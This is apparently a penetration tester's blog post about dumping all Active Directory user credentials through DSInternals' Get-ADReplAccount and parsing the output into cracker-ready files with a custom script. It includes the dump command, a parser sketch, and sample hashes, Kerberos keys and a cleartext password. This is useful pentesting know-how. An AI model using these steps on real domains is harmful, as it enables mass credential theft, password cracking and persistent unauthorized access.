Extracting NTDS Users Data... The Fastest Way.

Extracting what?

One of the most tedious and time-consuming tasks a pentester has to do when assessing a company's domain is extracting the NTDS.dit file, usually located on the Domain Controllers of the Active Directory.

Retrieving the hashes of all users from Active Directory is the first thing a hacker (well... I think) should do after obtaining Domain Admin privileges. Obtaining the LM/NTLM hashes is crucial: it opens up a huge list of possibilities for maintaining access after a successful exploitation (i.e. Golden Ticket, password cracking, pass-the-hash, etc.), and looks beautiful when documented in a pentesting report ;)

Common ways to dump hashes

There are at least 3 well-known ways of extracting the LM/NTLM hashes from Active Directory.

  1. Extracting the NTDS.dit file from a shadow copy using vssadmin, dumping the datatable and link_table tables with esedbexport from the esedbtools framework, and retrieving the users' data with scripts from the NTDSXtract framework, such as dsusers.py or dshashes.py.
  2. Uploading an executable (or malicious) file to a Domain Controller, such as dumpntds.exe (Github), to create the datatable and link_table files, or executing a Meterpreter session and then running hashdump.
  3. Retrieving hashes (and maybe passwords) remotely using the Get-ADReplAccount cmdlet from the DSInternals suite.

All of these methods are effective, and all of them retrieve the data we are looking for. But not all of them are efficient.

Method 1: Getting the NTDS.dit and processing offline

Cons:

  • When the NTDS.dit file is huge, usually because the domain has many users, copying and downloading the file is very time-consuming. It is even worse when the network is slow.
  • After the painful download of the NTDS.dit file, you still need to extract the datatable and link_table tables. The processing time of this task is proportional to the number of users registered in the domain. (Once, I had to extract hashes from a domain that had a 10 GB NTDS.dit file. I spent almost a week obtaining the domain users' LM/NTLM hashes.)

Method 2: Extracting the tables on the DC and processing them offline

Cons:

  • Running the table-dumping process of the NTDS.dit file on the Domain Controller may take less time than method 1, but it is still inefficient.
  • We still have to deal with processing the datatable and link_table files, which can be quite time-consuming in some cases.
  • On the other hand, Meterpreter dumps the LM/NTLM hashes pretty quickly, but unfortunately the hashdump module does not retrieve all the hashes.

Method 3: Retrieving hashes remotely with DSInternals

Cons:

  • This is probably the fastest way to obtain the info we are looking for. But despite the quickness of the process, the output is not readable by password cracking tools (i.e. hashcat, john, l0phtcrack).
  • Parsing the file to feed the password cracking process can be tedious.
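To see why parsing is needed, here is a minimal sketch of the format mismatch: Get-ADReplAccount prints one field per line, while crackers such as hashcat (NTLM mode with --username) and john expect simple user:hash lines. The two-field record below is a hypothetical excerpt built from the example shown later in this post.

```python
import re

# Hypothetical one-record excerpt of Get-ADReplAccount output (values taken
# from the example record shown later in this post).
record = """SamAccountName: April
NTHash: 92937945b518814341de3f726500d4ff"""

# Crackers expect a single "user:hash" line, so the two fields have to be
# stitched together from separate lines of the dump.
user = re.search(r"SamAccountName:\s*(\S+)", record).group(1)
nthash = re.search(r"NTHash:\s*([0-9a-fA-F]{32})", record).group(1)
print(f"{user}:{nthash}")  # April:92937945b518814341de3f726500d4ff
```

Doing this by hand (or with ad-hoc grep/cut pipelines) for thousands of users, plus the history and WDigest sections, is exactly the tedious part.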

The fastest way

The fastest way is retrieving hashes with the DSInternals suite, but the output file is not readable by the most common password cracking tools.

To make the LM/NTLM hash extraction process easier, I have developed a script that takes the Get-ADReplAccount output and parses it into a password-cracking-friendly format. The script is called dsinternalsparser.py and can be downloaded here.

-----------------------
DSInternals Parser v1.0
-----------------------
usage: dsinternalsparser.py [-h] [-o OUTPUT] [--ntlm] [--nthistory] [--lm]
                            [--lmhistory] [--cleartext] [--wdigest]
                            input_file

Parses a Get-ADReplAccount generated file to extract credentials data,
including hashes.

positional arguments:
  input_file            File to process, generated by Get-ADReplAccount of
                        DSInternals

optional arguments:
  -h, --help            show this help message and exit
  -o OUTPUT, --output OUTPUT
                        Prefix name for output files.
  --ntlm                Generate the file with username and current NTLM hash.
  --nthistory           Generate the file with username and history NTLM
                        hashes.
  --lm                  Generate the file with username and current LM hash.
  --lmhistory           Generate the file with username and history LM hashes.
  --cleartext           Generate the file with existent users that have
                        ClearText password.
  --wdigest             Generate the file with existent users that have
                        Wdigest password.

The script takes the output file of the Get-ADReplAccount execution and creates text files containing the data, organized and ready to use. To make it clear, let's walk through an example.

Execute the following command to obtain all the user data, right after setting the $cred variable with the Get-Credential cmdlet:

Get-ADReplAccount -All -Server dc01 -NamingContext "dc=anotherdomain,dc=org" -Credential $cred > output.txt

After executing Get-ADReplAccount, we obtain a file like this one:

example.txt
-----------
DistinguishedName: CN=April Reagan,OU=IT,DC=Adatum,DC=com
Sid: S-1-5-21-3180365339-800773672-3767752645-1375
Guid: 124ae098-699b-4450-a47a-314a29cc90ea
SamAccountName: April
SamAccountType: User
UserPrincipalName: April@adatum.com
PrimaryGroupId: 513
SidHistory:
Enabled: True
Deleted: False
LastLogon:
DisplayName: April Reagan
GivenName: April
Surname: Reagan
Description:
NTHash: 92937945b518814341de3f726500d4ff
LMHash: 727e3576618fa1754a3b108f3fa6cb6d
NTHashHistory:
Hash 01: 92937945b518814341de3f726500d4ff
Hash 02: 1d3da193d2f45911a6f0fa940b9fb32f
Hash 03: 402bc59d8a00641b7f386e78596340f4
LMHashHistory:
Hash 01: 727e3576618fa1754a3b108f3fa6cb6d
Hash 02: 5a5503d0e85f58abaad3b435b51404ee
Hash 03: f9393d97e7a1873caad3b435b51404ee
SupplementalCredentials:
ClearText: Pa$$w0rd
Kerberos:
Credentials:
DES_CBC_MD5
Key: 76fe3b5bda911a40
OldCredentials:
DES_CBC_MD5
Key: 7f8c4f38e0ea0b80
Salt: ADATUM.COMApril
Flags: 0
KerberosNew:
Credentials:
AES256_CTS_HMAC_SHA1_96
Key: 3a3b6a89bb82d112db5ef68f6db5d1afc2b806df61dcd85e3eacf3b85ee382d8
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: a72c8bc96c4a6f03244f0b0067a1e440
Iterations: 4096
DES_CBC_MD5
Key: 76fe3b5bda911a40
Iterations: 4096
OldCredentials:
AES256_CTS_HMAC_SHA1_96
Key: 14e46244a59a37cd8aa7c1fe61896441c7d065fafe4874191e69c1fe28856810
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 034b512ec64286dec951d6aff8d81fa8
Iterations: 4096
DES_CBC_MD5
Key: 7f8c4f38e0ea0b80
Iterations: 4096
OlderCredentials:
AES256_CTS_HMAC_SHA1_96
Key: 2387ca8f936c8c154996809af8fee7c47fe4b9b5dd84d051fc43a9289bbaa3ab
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 29d536ec057f9063747161429b81f056
Iterations: 4096
DES_CBC_MD5
Key: 58f1cbe6e50e1f83
Iterations: 4096
ServiceCredentials:
Salt: ADATUM.COMApril
DefaultIterationCount: 4096
Flags: 0
WDigest:
Hash 01: c3d012ab1101eb8f51b483fb4c5f8a7e
Hash 02: c993da396914645b356ae7816251fcb1
Hash 03: 6b58530cab34de91189a603e22c2be15
Hash 04: c3d012ab1101eb8f51b483fb4c5f8a7e
Hash 05: 5a762cf59fa31023dcba1ebd4725b443
Hash 06: c78bac91c0ba25cae5d44460fd65a73b
Hash 07: 59d73cea16afd1aac6bf8acfa2768621
Hash 08: d2be383db9469a39736d9e2136054131
Hash 09: 079de9f4d94d97a80f1726497dfd1cc2
Hash 10: 85dbe1549d5fbfcc91f7fe5ac5910f52
Hash 11: 961a36bded5535b8fc15b4b8e6c48b93
Hash 12: 6ac8a60d83e9ae67c2097db716a6af17
Hash 13: e899e577d5f81ef5288ab67de07fad9a
Hash 14: 135452ab86d40c3d47ca849646d5e176
Hash 15: a84c367eaa334d0a4cb98e36da011e0f
Hash 16: 61a458eb70440b1a92639452f0c2c948
Hash 17: 238f4059776c3575be534afb46be4ccf
Hash 18: 03ddf370064c544e9c6dbb6ccbf8f4ac
Hash 19: 354dd6c77ccf35f63e48cd5af6473ccf
Hash 20: 5f9800d734ebe9fb588def6aaafc40b7
Hash 21: 59aab99ebcddcbf13b96d75bb7a731e3
Hash 22: f1685383b0c131035ae264ee5bd24a8d
Hash 23: 3119e42886b01cad00347e72d0cee594
Hash 24: ebef7f2c730e17ded8cba1ed20122602
Hash 25: 7d99673c9895e0b9c484e430578ee78e
Hash 26: e1e20982753c6a1140c1a8241b23b9ea
Hash 27: e5ec1c63e0e549e49cda218bc3752051
Hash 28: 26f2d85f7513d73dd93ab3afd2d90cf6
Hash 29: 84010d657e6b58ce233fae2bd7644222

In the example.txt file, we dumped a domain with only one user. Now, to process the file, we run dsinternalsparser.py from a terminal:


./dsinternalsparser.py example.txt

After processing, the script by default generates all the possible output files with the prefix output. If you want only certain files, you must specify them as parameters (i.e. --ntlm, --cleartext, --lmhistory, etc.). Likewise, you can change the output filename prefix with the -o parameter.

As a result, the script generates output files like these:

--------------------
output_cleartext.txt
--------------------
April:Pa$$w0rd
-------------
output_lm.txt
-------------
April:727e3576618fa1754a3b108f3fa6cb6d
---------------
output_ntlm.txt
---------------
April:92937945b518814341de3f726500d4ff
---------------------
output_lm_history.txt
---------------------
April_lmhistory0:727e3576618fa1754a3b108f3fa6cb6d
April_lmhistory1:5a5503d0e85f58abaad3b435b51404ee
April_lmhistory2:f9393d97e7a1873caad3b435b51404ee
-----------------------
output_ntlm_history.txt
-----------------------
April_nthistory0:92937945b518814341de3f726500d4ff
April_nthistory1:1d3da193d2f45911a6f0fa940b9fb32f
April_nthistory2:402bc59d8a00641b7f386e78596340f4
------------------
output_wdigest.txt
------------------
April_wdhistory0:c3d012ab1101eb8f51b483fb4c5f8a7e
April_wdhistory1:c993da396914645b356ae7816251fcb1
April_wdhistory2:6b58530cab34de91189a603e22c2be15
April_wdhistory3:c3d012ab1101eb8f51b483fb4c5f8a7e
April_wdhistory4:5a762cf59fa31023dcba1ebd4725b443
April_wdhistory5:c78bac91c0ba25cae5d44460fd65a73b
April_wdhistory6:59d73cea16afd1aac6bf8acfa2768621
April_wdhistory7:d2be383db9469a39736d9e2136054131
April_wdhistory8:079de9f4d94d97a80f1726497dfd1cc2
April_wdhistory9:85dbe1549d5fbfcc91f7fe5ac5910f52
April_wdhistory10:961a36bded5535b8fc15b4b8e6c48b93
April_wdhistory11:6ac8a60d83e9ae67c2097db716a6af17
April_wdhistory12:e899e577d5f81ef5288ab67de07fad9a
April_wdhistory13:135452ab86d40c3d47ca849646d5e176
April_wdhistory14:a84c367eaa334d0a4cb98e36da011e0f
April_wdhistory15:61a458eb70440b1a92639452f0c2c948
April_wdhistory16:238f4059776c3575be534afb46be4ccf
April_wdhistory17:03ddf370064c544e9c6dbb6ccbf8f4ac
April_wdhistory18:354dd6c77ccf35f63e48cd5af6473ccf
April_wdhistory19:5f9800d734ebe9fb588def6aaafc40b7
April_wdhistory20:59aab99ebcddcbf13b96d75bb7a731e3
April_wdhistory21:f1685383b0c131035ae264ee5bd24a8d
April_wdhistory22:3119e42886b01cad00347e72d0cee594
April_wdhistory23:ebef7f2c730e17ded8cba1ed20122602
April_wdhistory24:7d99673c9895e0b9c484e430578ee78e
April_wdhistory25:e1e20982753c6a1140c1a8241b23b9ea
April_wdhistory26:e5ec1c63e0e549e49cda218bc3752051
April_wdhistory27:26f2d85f7513d73dd93ab3afd2d90cf6
April_wdhistory28:84010d657e6b58ce233fae2bd7644222


These files can be used to speed up the processing of Domain Users information, including the password cracking process.
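The core of the parsing is straightforward. Below is a minimal sketch of the idea (not the actual dsinternalsparser.py code): split the dump into per-user records on the DistinguishedName field, collect the credential fields, and emit the user:hash lines. The SAMPLE string and the second user are hypothetical test data assembled from the hashes in this post.

```python
# Simplified sketch of what a Get-ADReplAccount parser has to do; the real
# dsinternalsparser.py handles more fields (histories, WDigest, etc.).
SAMPLE = """DistinguishedName: CN=April Reagan,OU=IT,DC=Adatum,DC=com
SamAccountName: April
NTHash: 92937945b518814341de3f726500d4ff
LMHash: 727e3576618fa1754a3b108f3fa6cb6d
ClearText: Pa$$w0rd
DistinguishedName: CN=Bob,OU=IT,DC=Adatum,DC=com
SamAccountName: Bob
NTHash: 1d3da193d2f45911a6f0fa940b9fb32f
"""

def parse_records(text):
    """Split the dump into per-user records and collect the credential fields."""
    users = []
    current = None
    for line in text.splitlines():
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "DistinguishedName":  # each record starts with this field
            current = {}
            users.append(current)
        elif current is not None and key in ("SamAccountName", "NTHash",
                                             "LMHash", "ClearText"):
            current[key] = value
    return users

def ntlm_lines(users):
    """Emit cracker-friendly 'user:hash' lines, as in output_ntlm.txt."""
    return [f"{u['SamAccountName']}:{u['NTHash']}" for u in users if "NTHash" in u]

for line in ntlm_lines(parse_records(SAMPLE)):
    print(line)
```

The same record dictionaries feed the other output files (output_lm.txt, output_cleartext.txt, and so on), which is why a single pass over the dump is enough.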


I compared the processing time from NTDS.dit to LM/NTLM hashes on a 10 GB file. As I mentioned, the traditional way took me almost a week to obtain the data needed to start password cracking. Using this last method, I obtained all the hashes in hashcat format in 20 minutes.

To sum up, the fastest way (I have found) to dump the Domain Users information from the NTDS.dit file is:

  1. Get the output file from a Get-ADReplAccount execution.
  2. Download the file and parse it with dsinternalsparser.py.
  3. Enjoy >:)

For more information about the Get-ADReplAccount cmdlet and DSInternals, refer to:
If you have questions about dsinternalsparser.py, go to:

Happy dumping.


#r4wd3r
